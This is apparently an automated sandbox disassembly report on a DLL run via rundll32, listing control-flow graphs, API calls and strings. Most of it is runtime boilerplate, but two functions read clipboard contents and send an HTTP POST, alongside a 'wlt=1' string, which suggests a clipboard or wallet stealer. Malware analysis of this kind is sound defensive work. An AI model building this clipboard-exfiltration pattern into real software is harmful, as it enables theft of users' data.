6fb9effc ___scrt_uninitialize_crt EnterCriticalSection 9608->9609 9610 6fb9f158 9609->9610 9611 6fb9f19f 9610->9611 9613 6fb9f0d3 ___scrt_uninitialize_crt 25 API calls 9610->9613 9612 6fb9b686 _free 14 API calls 9611->9612 9614 6fb9f1a4 9612->9614 9615 6fb9f184 FlushFileBuffers 9613->9615 9618 6fb9f1d3 ___scrt_uninitialize_crt LeaveCriticalSection 9614->9618 9615->9614 9616 6fb9f190 9615->9616 9617 6fb9b673 __dosmaperr 14 API calls 9616->9617 9619 6fb9f195 GetLastError 9617->9619 9620 6fb9f1bc 9618->9620 9619->9611 9620->9578 9621->9554 9622->9540 9628 6fb9ad22 9623->9628 9626 6fb9804e ___vcrt_uninitialize_ptd 6 API calls 9627 6fb96f21 9626->9627 9627->8985 9631 6fb9b504 9628->9631 9632 6fb96939 9631->9632 9633 6fb9b50e 9631->9633 9632->9626 9635 6fb9d01e 9633->9635 9636 6fb9cefd _free 5 API calls 9635->9636 9637 6fb9d03a 9636->9637 9638 6fb9d043 9637->9638 9639 6fb9d055 TlsFree 9637->9639 9638->9632 9640 6fb9b423 GetLastError 9641 6fb9b43a 9640->9641 9642 6fb9b440 9640->9642 9643 6fb9d05d _free 6 API calls 9641->9643 9644 6fb9d09c _free 6 API calls 9642->9644 9662 6fb9b446 SetLastError 9642->9662 9643->9642 9645 6fb9b45e 9644->9645 9646 6fb9b8b2 _free 12 API calls 9645->9646 9645->9662 9647 6fb9b46e 9646->9647 9649 6fb9b48d 9647->9649 9650 6fb9b476 9647->9650 9652 6fb9d09c _free 6 API calls 9649->9652 9651 6fb9d09c _free 6 API calls 9650->9651 9653 6fb9b484 9651->9653 9654 6fb9b499 9652->9654 9658 6fb9b90f _free 12 API calls 9653->9658 9655 6fb9b49d 9654->9655 9656 6fb9b4ae 9654->9656 9659 6fb9d09c _free 6 API calls 9655->9659 9657 6fb9b0ce _free 12 API calls 9656->9657 9660 6fb9b4b9 9657->9660 9658->9662 9659->9653 9661 6fb9b90f _free 12 API calls 9660->9661 9661->9662 11377 6fb95a10 11378 6fb95a64 11377->11378 11379 6fb95a40 11377->11379 11384 6fb95ed0 11378->11384 11381 6fb95d90 36 API calls 11379->11381 11383 6fb95a5a 11381->11383 11387 6fb96771 11384->11387 11392 6fb96705 11387->11392 11390 6fb97b0e CallUnexpected RaiseException 11391 6fb96790 11390->11391 11393 6fb96660 std::exception::exception 25 API calls 11392->11393 11394 6fb96717 11393->11394 11394->11390 9663 6fb97062 9664 6fb9706b 9663->9664 9665 6fb97070 9663->9665 9680 6fb97445 9664->9680 9669 6fb96f2c 9665->9669 9672 6fb96f38 __FrameHandler3::FrameUnwindToState 9669->9672 9670 6fb96f47 9671 6fb96f61 dllmain_raw 9671->9670 9673 6fb96f7b dllmain_crt_dispatch 9671->9673 9672->9670 9672->9671 9674 6fb96f5c __DllMainCRTStartup@12 9672->9674 9673->9670 9673->9674 9675 6fb96fcd 9674->9675 9678 6fb96e7a __DllMainCRTStartup@12 84 API calls 9674->9678 9675->9670 9676 6fb96fd6 dllmain_crt_dispatch 9675->9676 9676->9670 9677 6fb96fe9 dllmain_raw 9676->9677 9677->9670 9679 6fb96fc2 dllmain_raw 9678->9679 9679->9675 9681 6fb9745b 9680->9681 9683 6fb97464 9681->9683 9684 6fb973f8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9681->9684 9683->9665 9684->9683

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 6fb91ec0-6fb91f1c call 6fb96751 4 6fb9242e-6fb92459 call 6fb95d90 0->4 5 6fb91f22-6fb91f26 0->5 11 6fb9245b-6fb92467 4->11 12 6fb92483-6fb9249b 4->12 5->4 6 6fb91f2c-6fb91f30 5->6 6->4 8 6fb91f36-6fb92053 call 6fb95d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 6->8 20 6fb92059 8->20 21 6fb9225f-6fb922c8 InternetCloseHandle * 3 8->21 13 6fb92479-6fb92480 call 6fb9679f 11->13 14 6fb92469-6fb92477 11->14 16 6fb924a1-6fb924ad 12->16 17 6fb923e5-6fb923fd 12->17 13->12 14->13 18 6fb924ef call 6fb999dc 14->18 22 6fb923db-6fb923e2 call 6fb9679f 16->22 23 6fb924b3-6fb924c1 16->23 24 6fb92403-6fb9240f 17->24 25 6fb924d2-6fb924ee call 6fb96791 17->25 38 6fb924f4-6fb924f9 call 6fb96c3c 18->38 30 6fb92060-6fb92067 20->30 26 6fb922ca-6fb922d9 21->26 27 6fb922ff-6fb9231d 21->27 22->17 23->18 32 6fb924c3 23->32 33 6fb924c8-6fb924cf call 6fb9679f 24->33 34 6fb92415-6fb92423 24->34 36 6fb922db-6fb922e9 26->36 37 6fb922ef-6fb922fc call 6fb9679f 26->37 39 6fb9231f-6fb92330 27->39 40 6fb92350-6fb92371 27->40 41 6fb92259 30->41 42 6fb9206d-6fb9209b 30->42 32->22 33->25 34->18 45 6fb92429 34->45 36->18 36->37 37->27 49 6fb92332-6fb92340 39->49 50 6fb92346-6fb9234d call 6fb9679f 39->50 53 6fb9239f-6fb923b7 40->53 54 6fb92373-6fb9237f 40->54 41->21 51 6fb920a0-6fb920a5 42->51 45->33 49->18 49->50 50->40 51->51 58 6fb920a7-6fb9214b call 6fb95d90 * 2 51->58 53->17 55 6fb923b9-6fb923c5 53->55 60 6fb92381-6fb9238f 54->60 61 6fb92395-6fb9239c call 6fb9679f 54->61 55->22 63 6fb923c7-6fb923d5 55->63 70 6fb9214d-6fb9217f call 6fb99260 58->70 71 6fb92181-6fb9219a call 6fb96390 58->71 60->18 60->61 61->53 63->18 63->22 76 6fb921a0-6fb921ad 70->76 71->76 77 6fb921da-6fb921e7 76->77 78 6fb921af-6fb921ba 76->78 81 6fb921e9-6fb921f8 77->81 82 6fb92218-6fb92223 77->82 79 6fb921bc-6fb921ca 78->79 80 6fb921d0-6fb921d7 call 6fb9679f 78->80 79->18 79->80 80->77 84 6fb921fa-6fb92208 81->84 85 6fb9220e-6fb92215 call 6fb9679f 81->85 82->38 86 6fb92229-6fb92253 InternetReadFile 82->86 84->18 84->85 85->82 86->30 86->41
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 6FB91EC5
                          • Part of subcall function 6FB96751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6FB9675D
                        • InternetOpenW.WININET(6FBABA14,00000000,00000000,00000000,00000000), ref: 6FB91FA7
                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6FB91FCE
                        • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6FB91FF8
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6FB92031
                        • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6FB9204B
                        • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6FB9224B
                        • InternetCloseHandle.WININET(00000000), ref: 6FB92266
                        • InternetCloseHandle.WININET(?), ref: 6FB9226E
                        • InternetCloseHandle.WININET(?), ref: 6FB92276
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: Content-Type: application/x-www-form-urlencoded$POST$string too long
                        • API String ID: 4066372336-370044323
                        • Opcode ID: 4307e206b97c8c6cccd1fef2bed9f4055441df59edf2ce7ab19744ffd76258e1
                        • Instruction ID: 1951f8bb7ad7231e1a953788a0250b22e2eef4f67957806707e1fc655f13c8d0
                        • Opcode Fuzzy Hash: 4307e206b97c8c6cccd1fef2bed9f4055441df59edf2ce7ab19744ffd76258e1
                        • Instruction Fuzzy Hash: CFF183B0A001589FEB25CF28DC54B9DBBB5EF46304F5041E9E608AB2C1D7759AC4CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 207 6fb931b0-6fb933a6 211 6fb933a8-6fb933b4 207->211 212 6fb933db-6fb933f7 call 6fb96791 207->212 213 6fb933d1-6fb933d8 call 6fb9679f 211->213 214 6fb933b6-6fb933c4 211->214 213->212 214->213 216 6fb933f8-6fb934f3 call 6fb999dc call 6fb95ed0 call 6fb95d90 214->216 227 6fb9351d-6fb93530 216->227 228 6fb934f5-6fb93501 216->228 229 6fb93513-6fb9351a call 6fb9679f 228->229 230 6fb93503-6fb93511 228->230 229->227 230->229 231 6fb93531-6fb936d1 call 6fb999dc call 6fb95d90 230->231 241 6fb936d3-6fb936df 231->241 242 6fb93734-6fb93750 call 6fb96791 231->242 243 6fb9372a-6fb93731 call 6fb9679f 241->243 244 6fb936e1-6fb936ef 241->244 243->242 244->243 246 6fb93751-6fb93823 call 6fb999dc call 6fb95ed0 call 6fb96060 244->246 257 6fb9384d-6fb9385e 246->257 258 6fb93825-6fb93831 246->258 259 6fb93843-6fb9384a call 6fb9679f 258->259 260 6fb93833-6fb93841 258->260 259->257 260->259 261 6fb9385f-6fb938d5 call 6fb999dc OpenClipboard 260->261 266 6fb938db-6fb938ea GetClipboardData 261->266 267 6fb93a87-6fb93a99 261->267 268 6fb93a81 CloseClipboard 266->268 269 6fb938f0-6fb938fc GlobalLock 266->269 268->267 270 6fb93a7a-6fb93a7b GlobalUnlock 269->270 271 6fb93902-6fb93921 WideCharToMultiByte 269->271 270->268 271->270 272 6fb93927-6fb93a50 call 6fb96230 WideCharToMultiByte call 6fb95d90 271->272 272->270 282 6fb93a52-6fb93a5e 272->282 283 6fb93a70-6fb93a77 call 6fb9679f 282->283 284 6fb93a60-6fb93a6e 282->284 283->270 284->283 285 6fb93a9a-6fb93b6d call 6fb999dc call 6fb95d90 call 6fb95b80 * 2 call 6fb91ed0 call 6fb95b80 call 6fb95d90 call 6fb931b0 284->285
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
                        • API String ID: 0-2251221455
                        • Opcode ID: 19960814e2c19478e077eb5a2b2e7d1ae9fdd001d3a7a2565306006535361fc0
                        • Instruction ID: 7df0878884fc3e7e1ef90e433190a1feb76ee57b0131ec8cde8bc297bd2fcd72
                        • Opcode Fuzzy Hash: 19960814e2c19478e077eb5a2b2e7d1ae9fdd001d3a7a2565306006535361fc0
                        • Instruction Fuzzy Hash: C5F11A70A00288EFEB04CF69DC55B9EBBB9FF46714F14422DE815A73C0DB75A9448BA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 90 6fb91ed0-6fb91f1c 91 6fb9242e-6fb92459 call 6fb95d90 90->91 92 6fb91f22-6fb91f26 90->92 98 6fb9245b-6fb92467 91->98 99 6fb92483-6fb9249b 91->99 92->91 93 6fb91f2c-6fb91f30 92->93 93->91 95 6fb91f36-6fb92053 call 6fb95d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 93->95 107 6fb92059 95->107 108 6fb9225f-6fb922c8 InternetCloseHandle * 3 95->108 100 6fb92479-6fb92480 call 6fb9679f 98->100 101 6fb92469-6fb92477 98->101 103 6fb924a1-6fb924ad 99->103 104 6fb923e5-6fb923fd 99->104 100->99 101->100 105 6fb924ef call 6fb999dc 101->105 109 6fb923db-6fb923e2 call 6fb9679f 103->109 110 6fb924b3-6fb924c1 103->110 111 6fb92403-6fb9240f 104->111 112 6fb924d2-6fb924ee call 6fb96791 104->112 125 6fb924f4-6fb924f9 call 6fb96c3c 105->125 117 6fb92060-6fb92067 107->117 113 6fb922ca-6fb922d9 108->113 114 6fb922ff-6fb9231d 108->114 109->104 110->105 119 6fb924c3 110->119 120 6fb924c8-6fb924cf call 6fb9679f 111->120 121 6fb92415-6fb92423 111->121 123 6fb922db-6fb922e9 113->123 124 6fb922ef-6fb922fc call 6fb9679f 113->124 126 6fb9231f-6fb92330 114->126 127 6fb92350-6fb92371 114->127 128 6fb92259 117->128 129 6fb9206d-6fb9209b 117->129 119->109 120->112 121->105 132 6fb92429 121->132 123->105 123->124 124->114 136 6fb92332-6fb92340 126->136 137 6fb92346-6fb9234d call 6fb9679f 126->137 140 6fb9239f-6fb923b7 127->140 141 6fb92373-6fb9237f 127->141 128->108 138 6fb920a0-6fb920a5 129->138 132->120 136->105 136->137 137->127 138->138 145 6fb920a7-6fb9214b call 6fb95d90 * 2 138->145 140->104 142 6fb923b9-6fb923c5 140->142 147 6fb92381-6fb9238f 141->147 148 6fb92395-6fb9239c call 6fb9679f 141->148 142->109 150 6fb923c7-6fb923d5 142->150 157 6fb9214d-6fb9217f call 6fb99260 145->157 158 6fb92181-6fb9219a call 6fb96390 145->158 147->105 147->148 148->140 150->105 150->109 163 6fb921a0-6fb921ad 157->163 158->163 164 6fb921da-6fb921e7 163->164 165 6fb921af-6fb921ba 163->165 168 6fb921e9-6fb921f8 164->168 169 6fb92218-6fb92223 164->169 166 6fb921bc-6fb921ca 165->166 167 6fb921d0-6fb921d7 call 6fb9679f 165->167 166->105 166->167 167->164 171 6fb921fa-6fb92208 168->171 172 6fb9220e-6fb92215 call 6fb9679f 168->172 169->125 173 6fb92229-6fb92253 InternetReadFile 169->173 171->105 171->172 172->169 173->117 173->128
                        APIs
                        • InternetOpenW.WININET(6FBABA14,00000000,00000000,00000000,00000000), ref: 6FB91FA7
                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6FB91FCE
                        • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6FB91FF8
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6FB92031
                        • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6FB9204B
                        • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6FB9224B
                        • InternetCloseHandle.WININET(00000000), ref: 6FB92266
                        • InternetCloseHandle.WININET(?), ref: 6FB9226E
                        • InternetCloseHandle.WININET(?), ref: 6FB92276
                        Strings
                        • Content-Type: application/x-www-form-urlencoded, xrefs: 6FB91F71
                        • POST, xrefs: 6FB91FF2
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                        • String ID: Content-Type: application/x-www-form-urlencoded$POST
                        • API String ID: 1354133546-2387545335
                        • Opcode ID: 2394a75b5967b6a38b2e88eae64c2df8001b108247f5f281b1913279b2610f37
                        • Instruction ID: 8a417987f7edf2e42fbd3cc595816e89ecbbdcac48547a3050354bda43412a37
                        • Opcode Fuzzy Hash: 2394a75b5967b6a38b2e88eae64c2df8001b108247f5f281b1913279b2610f37
                        • Instruction Fuzzy Hash: E7F182B0A001589FEB25CF28DC94B9DBBB6EF46304F5041E9E608AB2C1D7759AC4CF95

                        Control-flow Graph

                        APIs
                        • __RTC_Initialize.LIBCMT ref: 6FB96EC1
                        • ___scrt_uninitialize_crt.LIBCMT ref: 6FB96EDB
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: Initialize___scrt_uninitialize_crt
                        • String ID:
                        • API String ID: 2442719207-0
                        • Opcode ID: 94c5f8e5fa957dd5291937e4ae9e760f5ecd4561f0c602d43a4f178ba49a237c
                        • Instruction ID: 6a51e049ff3d76a972c2f136f61d38869838ef68e3698b7ee9e38b8d1b4e42ff
                        • Opcode Fuzzy Hash: 94c5f8e5fa957dd5291937e4ae9e760f5ecd4561f0c602d43a4f178ba49a237c
                        • Instruction Fuzzy Hash: 0E41D972D047D8AFDB218F65ED40BAE3BB6EF477A4F10413AE81497280D77059019BD0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 353 6fb96f2c-6fb96f3d call 6fb973b0 356 6fb96f3f-6fb96f45 353->356 357 6fb96f4e-6fb96f55 353->357 356->357 358 6fb96f47-6fb96f49 356->358 359 6fb96f61-6fb96f75 dllmain_raw 357->359 360 6fb96f57-6fb96f5a 357->360 361 6fb97027-6fb97036 358->361 363 6fb96f7b-6fb96f8c dllmain_crt_dispatch 359->363 364 6fb9701e-6fb97025 359->364 360->359 362 6fb96f5c-6fb96f5f 360->362 365 6fb96f92-6fb96fa4 call 6fb96640 362->365 363->364 363->365 364->361 368 6fb96fcd-6fb96fcf 365->368 369 6fb96fa6-6fb96fa8 365->369 371 6fb96fd1-6fb96fd4 368->371 372 6fb96fd6-6fb96fe7 dllmain_crt_dispatch 368->372 369->368 370 6fb96faa-6fb96fc8 call 6fb96640 call 6fb96e7a dllmain_raw 369->370 370->368 371->364 371->372 372->364 374 6fb96fe9-6fb9701b dllmain_raw 372->374 374->364
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: dllmain_raw$dllmain_crt_dispatch
                        • String ID:
                        • API String ID: 3136044242-0
                        • Opcode ID: 2567ee9368fad7a3c9bb8b458e39211994b2f20ca5aad192935c015134c9d5c7
                        • Instruction ID: 41ff49b33b76a3cb44df7c5a0ed941bff11a6a8756efb220436602ec4c5f61f5
                        • Opcode Fuzzy Hash: 2567ee9368fad7a3c9bb8b458e39211994b2f20ca5aad192935c015134c9d5c7
                        • Instruction Fuzzy Hash: A4218371D006ADABDB218F15ED40AAF3ABAEF87B94F114136F8149B250D7719D019BE0

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32(?,?,00000001,6FB9B68B,6FB9B935,?,?,6FB9AB0E), ref: 6FB9B428
                        • _free.LIBCMT ref: 6FB9B485
                        • _free.LIBCMT ref: 6FB9B4BB
                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6FB9B68B,6FB9B935,?,?,6FB9AB0E), ref: 6FB9B4C6
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLast_free
                        • String ID:
                        • API String ID: 2283115069-0
                        • Opcode ID: ab2d219c4d7a55141ad4675b8aa92c96e6233b20db21576ed0adacddd8f1961b
                        • Instruction ID: f9549d98a05118898314118da0f14f1194927a5ee2255fefe9f34a7364df484e
                        • Opcode Fuzzy Hash: ab2d219c4d7a55141ad4675b8aa92c96e6233b20db21576ed0adacddd8f1961b
                        • Instruction Fuzzy Hash: E6110832604B806ADA101A7BBDA2F5E366ADFC7778B248234F534972C1DF218A225221

                        Control-flow Graph

                        APIs
                        • __RTC_Initialize.LIBCMT ref: 6FB96DC0
                          • Part of subcall function 6FB97490: InitializeSListHead.KERNEL32(6FBAF718,6FB96DCA,6FBAC770,00000010,6FB96D5B,?,?,?,6FB96F85,?,00000001,?,?,00000001,?,6FBAC7B8), ref: 6FB97495
                        • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6FB96E2A
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                        • String ID:
                        • API String ID: 3231365870-0
                        • Opcode ID: 37ccf47f8f46019a900a67c6a26adcc3fc9bc5f66c6e227a55c19e99acda5567
                        • Instruction ID: 2e993d1e09b70a3a28fda42857f7747431715c2433cd94c8a029ce9b8ee6be2b
                        • Opcode Fuzzy Hash: 37ccf47f8f46019a900a67c6a26adcc3fc9bc5f66c6e227a55c19e99acda5567
                        • Instruction Fuzzy Hash: 0A21D576948BC59EDF055BB8F4017DC37A3DF1336DF100476D4806B1C2CB62604586E5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 455 6fb9b8b2-6fb9b8bd 456 6fb9b8cb-6fb9b8d1 455->456 457 6fb9b8bf-6fb9b8c9 455->457 459 6fb9b8ea-6fb9b8fb RtlAllocateHeap 456->459 460 6fb9b8d3-6fb9b8d4 456->460 457->456 458 6fb9b8ff-6fb9b90a call 6fb9b686 457->458 464 6fb9b90c-6fb9b90e 458->464 461 6fb9b8fd 459->461 462 6fb9b8d6-6fb9b8dd call 6fb9e4b3 459->462 460->459 461->464 462->458 468 6fb9b8df-6fb9b8e8 call 6fb99eaa 462->468 468->458 468->459
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6FB9B46E,00000001,00000364,00000006,000000FF,?,00000001,6FB9B68B,6FB9B935,?,?,6FB9AB0E), ref: 6FB9B8F3
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 3e036fe6347172b0c152c89121b4194636e7a55e9085b331c7b595b637cdca59
                        • Instruction ID: ee12fe49befe4fc6a2e4eea5b00693b56344b42aebc3ee6f52e3ac9f95f7dd66
                        • Opcode Fuzzy Hash: 3e036fe6347172b0c152c89121b4194636e7a55e9085b331c7b595b637cdca59
                        • Instruction Fuzzy Hash: A9F0B431205BA9A7EB115E67AD84A9F3B58EF8B670B11C133E8149B1C4CB30E60146E0
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6FB97294
                        • IsDebuggerPresent.KERNEL32 ref: 6FB97360
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FB97380
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 6FB9738A
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        • Opcode ID: 62d08d2e9dcbc35a3432d4b318042301561eec7ab0c83d09bbab7f81ab283486
                        • Instruction ID: 055b9218d39801f65b2b4d86d4de6cc16e609c4b3c70d669197b55c4ed121fa9
                        • Opcode Fuzzy Hash: 62d08d2e9dcbc35a3432d4b318042301561eec7ab0c83d09bbab7f81ab283486
                        • Instruction Fuzzy Hash: F93129B5D053189BDF20DFA4D9897CDBBF8EF09304F1041AAE40DAB290EBB45A858F44
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6FB99918
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6FB99922
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6FB9992F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 2e2da0d69730781877387f2586dfcbab085a5a600a2921f4c78dbd6f5e1f8d5a
                        • Instruction ID: 585114415b05215c5a53aa37d461a2e539484e2b2dd6222ec2149821923b0980
                        • Opcode Fuzzy Hash: 2e2da0d69730781877387f2586dfcbab085a5a600a2921f4c78dbd6f5e1f8d5a
                        • Instruction Fuzzy Hash: EC31A4B49012289BCF61DF69D9897CDBBB8FF09310F5041EAE41CA7290E7749B958F44
                        APIs
                        • GetCurrentProcess.KERNEL32(?,?,6FB9A253,?,00000001,?,?), ref: 6FB9A276
                        • TerminateProcess.KERNEL32(00000000,?,6FB9A253,?,00000001,?,?), ref: 6FB9A27D
                        • ExitProcess.KERNEL32 ref: 6FB9A28F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
